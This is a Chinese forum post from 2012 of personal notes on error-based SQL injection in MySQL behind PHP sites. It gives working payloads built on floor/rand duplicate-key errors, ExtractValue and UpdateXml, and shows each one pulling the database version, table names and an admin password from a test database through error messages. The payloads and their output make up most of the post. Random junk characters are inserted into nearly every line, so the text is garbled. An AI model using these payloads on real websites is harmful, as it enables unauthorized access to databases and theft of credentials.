放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
6 C" \! _- V8 V1 o4 F实际测试环境:6 N& m/ Q ^( b# N9 l: v
$ i1 z+ L% N+ s. f+ E y
1 S# p/ s8 x0 f; s' }0 j5 smysql> show tables;
8 d& e6 U8 ~1 [- r/ v( D0 z) _+----------------+
7 n: a I: A2 ?; E9 p| Tables_in_test |
# C& `) P$ Q2 r* q! C w+ Y. e% D) H+----------------+
% {, } ^2 p7 Q$ |7 B! G: D; y# k( a; S| admin |- F" N8 Y6 F* H, n+ n5 Y" x y) V! b
| article |
; j4 `6 u6 `& M5 F+----------------+
! y# e% Y! Y5 ?" F ! L! c( v0 `8 V
0 T. n6 M' {2 C2 G j$ w1 @ h' e, l- Y* p
mysql> describe admin;3 P/ K% F0 c. H$ S7 N
+-------+------------------+------+-----+---------+----------------+
" l1 Y# {5 d$ ~% ?+ v| Field | Type | Null | Key | Default | Extra |
2 S( B8 M: o$ Q+-------+------------------+------+-----+---------+----------------+5 K. O, X/ i V7 ~) O3 i
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |& n& H ~* E& H2 W
| user | varchar(50) | NO | | NULL | |
% g4 Z) ^' b9 U0 E; U& b| pass | varchar(50) | NO | | NULL | | G# n" n/ }2 |
+-------+------------------+------+-----+---------+----------------+5 \/ y' u0 _' [: Y8 h3 ?3 o7 q
; b) b e6 B1 ?, `$ ~
8 {8 G" w/ Z: A& x4 W 7 W' L. q6 g/ ~4 L/ ?; m% z
mysql> describe article;. p! a5 o2 T) g, o8 B; j
+---------+------------------+------+-----+---------+----------------+
9 t/ ]6 ]/ r4 b Q0 Y% \6 }| Field | Type | Null | Key | Default | Extra |; |+ g- ] k2 d3 @% z6 u* s4 I, } x4 W
+---------+------------------+------+-----+---------+----------------+
( K S% |4 ~; _- e* [| id | int(10) unsigned | NO | PRI | NULL | auto_increment |7 F/ A7 X: L* ^0 H* `" N
| title | varchar(50) | NO | | NULL | |
# c0 l3 B7 r. V, g| content | varchar(50) | NO | | NULL | |! K4 r* K, P& d4 T% j# m
+---------+------------------+------+-----+---------+----------------+
8 N" y- L7 G" }" x1、通过floor报错. N" [9 E. R7 P2 l
可以通过如下一些利用代码 w b; g* j/ G- P; ^9 o
* e M. F6 ~( h+ X! E T n5 E9 }
4 |; ~- Y7 u7 \and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x/ j8 U3 q" C1 B7 O2 ]1 h' Q
from information_schema.tables group by x)a);* T8 C% z8 m' L/ d
/ p' d% u% R0 `1 R: b! f ( z6 i( t# ]2 l
and (select count(*) from (select 1 union select null union select !1)x
2 _: a; K1 H( F5 v2 g d# Fgroup by concat((select table_name from information_schema.tables limit 1),
3 f% a, {7 N2 sfloor(rand(0)*2)));- K& l7 i4 T5 ]3 u1 K
举例如下:6 y+ [* a* R+ e6 H
首先进行正常查询:
3 P. H# h- V' M' B
6 J H6 e( n1 ~mysql> select * from article where id = 1;
. d2 W0 ?3 Z6 C: ]1 s1 p% r+----+-------+---------+0 j- l1 ]8 W ~7 p3 s& z( {1 X
| id | title | content |
! \5 C7 W, |. Y2 i8 g+----+-------+---------+
. h* k5 `: _4 b' [| 1 | test | do it |, d$ [( M7 Q9 F) t0 O9 k
+----+-------+---------+: O. X. D- f" O& T' |
假如id输入存在注入的话,可以通过如下语句进行报错。" C' L! B9 o- z
5 D" m" L9 f) {; _2 V6 F + K0 G9 c- D; {
mysql> select * from article where id = 1 and (select 1 from
+ K( G/ v5 \5 c$ @(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
" J+ j, `0 Y6 \0 C2 d8 SERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
/ o* P* S$ O9 N0 D4 Y2 ?8 w可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* F" c' i Q8 A! i) z; \/ G' E
例如我们需要查询管理员用户名和密码:
+ _8 m& k5 d- O. l8 c6 ?0 UMethod1:0 ^5 \ u* u* `3 s3 b) M, N; N
' @5 T1 s0 k! f) M& ?
( H- b% p% i! ^8 I W
mysql> select * from article where id = 1 and (select 1 from
0 N+ R4 {/ a- ]# ~0 T0 `(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x/ R% \! S( |$ R# z7 [) }2 T; L+ z
from information_schema.tables group by x)a);7 b! ?% [1 \4 n% r% r ~
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
. b: ], e' T& PMethod2:! `8 q* K3 z! u& c
5 ?; e+ K0 Z h+ ]4 ]4 G
2 z5 p- H- @6 B+ h& Y4 v- Kmysql> select * from article where id = 1 and (select count(*)
! g( {9 V, Y' o3 I, I3 K. pfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
% I& y+ p V' N( T0 ufloor(rand(0)*2)));
5 n3 a# n9 M0 ]0 @, J9 H' z# w% iERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
% O1 l ?. |1 \& ?* m4 ~8 ]: P: P) l2、ExtractValue
9 X/ n" R2 R. |测试语句如下, e# w+ X4 i8 D$ V. O9 e
/ w$ e6 O" n+ h3 q / e- K, c; N+ @5 D, x9 \' K
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
' F4 F! C% o( L, [" z! p实际测试过程
3 t+ d, H/ ?3 q
7 L; E. A; U E' [' b# F0 \
' N0 p, D7 S, s2 Z3 k7 Q5 w/ Fmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,7 W4 n% w9 ]4 T
(select pass from admin limit 1)));--
* U: N) h i% W o5 B0 B- qERROR 1105 (HY000): XPATH syntax error: '\admin888'
( q2 m8 t5 [9 g6 X I3、UpdateXml2 b, G; U/ y+ P0 w6 p( m. C
测试语句* N" R( T& P: B" u" D
% j c% f: `- D2 q: X
9 A2 k! _! o2 k' b- cand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))2 Y5 A$ K* W) S2 c
实际测试过程2 ^) U7 x Z/ o
/ l9 i' b& [/ `8 j7 Y( E2 ~ r
) e% b- L. J6 ]) X! z. E" s4 j
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
; p# Y3 u' a5 y4 b1 k(select pass from admin limit 1),0x5e24),1));! q1 ~% o, G% h2 e& _
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'3 m5 E9 f5 T- g0 H1 @3 D) G
All, thanks foreign guys.
0 E9 g* |5 t; U O+ p5 z . r) J8 w' L: v- L
/ B' v& k1 f/ Q& p, A- I; ^
|
发表于 2012-12-10 10:28:51
收藏
支持
反对